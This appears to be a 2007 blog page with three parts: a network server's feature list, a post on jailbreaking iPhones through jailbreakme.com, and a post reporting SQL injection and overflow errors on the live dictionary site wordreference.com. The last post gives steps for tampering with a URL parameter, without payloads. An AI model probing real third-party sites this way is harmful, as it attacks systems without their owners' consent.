NAT to use private class LAN addresses hidden on the WAN with public addresses;

TCP/UDP port forwarding (PAT) to create Virtual Servers. This means that real server cluster will be seen with only one IP address (the IP of the virtual server) and each request will be distributed with Round Robin algorithm to the real servers;

Multizone DNS server with automatic management of the Reverse Resolution in-addr.arpa;

Multi subnet DHCP server with the possibility to fix IP depending on client's MAC address;
PPPoE client for connection to the WAN via ADSL, DSL and cable lines (requires a suitable MODEM);

Dynamic DNS client used to easily reach the host on WAN even when the IP is dynamic;

NTP (Network Time Protocol) client and server for keeping host clocks synchronized;

Syslog server for receiving and cataloging the system logs produced by the remote hosts including Unix systems, routers, switches, WI-FI access points, network printers and others compatible with the syslog protocol;

Kerberos 5 authentication using an integrated KDC and cross-authentication between realms;
LDAP, NIS and RADIUS authorization;

X509 certification authority for issuing and managing electronic certificates;

Unix and Windows Active Directory interoperability using LDAP and Kerberos 5 cross realm authentication.

Tuesday, October 30, 2007

Automatic Jailbreak For iPhone and iPod Touch

Another incredible way to Jailbreak and to install "installer" on your iPhone/iPodTouch .
Right Now you had to follow easy but long guides and you had to pay attention about your movements. Well, actually it's really easy just open safari and clik on Jailbreakme.com !!




Grabbed From http://www.modmyiphone.com

Its as easy as opening Safari on your iPhone/iPod Touch, and browse to jailbreakme.com. Thats it! Scroll down, and hit "Install AppSnapp". Safari should disappear, and pop you back to the Home screen. Wait patiently for a minute - don't touch anything til it pops you back to the Slide to Unlock screen.

Slide to unlock, and Installer.app will be installed on your iPhone/iPod Touch! You should prob install BSD Subsystem, Community Sources, and OpenSSH, and upgrade Installer.app if needed.

Erica Sadun from TUAW also refreshes the good tip that combining Open SSH and sshfs (part of Mac Fuse) allows you to drag and drop files to/from your iPod Touch/iPhone directly from Finder.



Thank so much guys !

Monday, October 29, 2007

Wordreference.com Vulnerable

Hi all,
today I've found two different kinds of vulnerability on www.wordreference.com .
As you know wordreference is one of the most important free dictionary in the net and thank to it I've learned a little English; for this reason I'll not post some real examples how to exploit it but I'll show just a proof of that.
The first vulnerability is a classic SQL Injection while the second one is a classic buffer over flaw, on arithmetic operation.First of all put a really common word as "a", you'll find a lot of translation and at the end of the page you'll find the "next 100" link as the following image shows






Pressing on this link and looking on the URL bar you'll see something like that






Try to change the "start" parameter putting the value "-1" and here we go ! You should see that:



But it's not enough, if you try to put also a long string in order to break into the pointer like the following one



You'll see another error like the following one



This is another bad example of input checking... Maybe a lot of problems could be resolved just putting a right input check inside application.